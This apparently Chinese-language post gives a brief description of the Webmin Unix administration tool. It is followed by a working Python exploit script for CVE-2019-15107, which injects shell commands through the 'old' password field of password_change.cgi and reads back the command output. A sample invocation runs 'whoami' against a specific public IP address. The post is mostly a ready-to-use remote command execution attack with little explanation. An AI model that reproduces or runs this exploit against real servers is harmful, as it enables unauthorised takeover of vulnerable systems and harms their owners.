Webmin是一个基于Web的界面,用于Unix的系统管理。使用任何现代Web浏览器,您可以设置用户帐户,Apache,DNS,文件共享等等。Webmin无需手动编辑/ etc / passwd等 Unix配置文件,并允许您从控制台或远程管理系统。Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。
命令执行脚本
import requests
import re
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys
banner ='''
_______ _______ _______ _______ __ _____ __ _______ __ _______ ______
( ____ \|\ /|( ____ \ / ___ )( __ )/ \ / ___ \ / \ ( ____ \/ \ ( __ )/ ___ \
| ( \/| ) ( || ( \/ \/ ) || ( ) |\/) ) ( ( ) ) \/) ) | ( \/\/) ) | ( ) |\/ ) )
| | | | | || (__ / )| | / | | | ( (___) | | | | (____ | | | | / | / /
| | ( ( ) )| __) _/ / | (/ /) | | | \____ | | | (_____ \ | | | (/ /) | / /
| | \ \_/ / | ( / _/ | / | | | | ) | | | ) ) | | | / | | / /
| (____/\ \ / | (____/\ ( (__/\| (__) |__) (_/\____) ) __) (_/\____) )__) (_| (__) | / /
(_______/ \_/ (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/
(_____) (_____)
python By jas502n
'''
print banner
def CVE_2019_15107(url, cmd):
vuln_url = url + "/password_change.cgi"
headers = {
'Accept-Encoding': "gzip, deflate",
'Accept': "*/*",
'Accept-Language': "en",
'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Connection': "close",
'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
'Referer': "%s/session_login.cgi"%url,
'Content-Type': "application/x-www-form-urlencoded",
'Content-Length': "60",
'cache-control': "no-cache"
}
payload="user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
r = requests.post(url=vuln_url, headers=headers, data=payload, verify=False)
if r.status_code ==200 and "The current password is " in r.content :
print "\nvuln_url= %s" % vuln_url
m = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
cmd_result = m.findall(r.content)[0]
print
print "Command Result = %s" % cmd_result
else:
print "No Vuln Exit!"
if __name__ == "__main__":
# url = "https://10.10.20.166:10000"
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15107(url, cmd)
python test.py https://188.40.189.135:58171 "whoami"

大概就这些......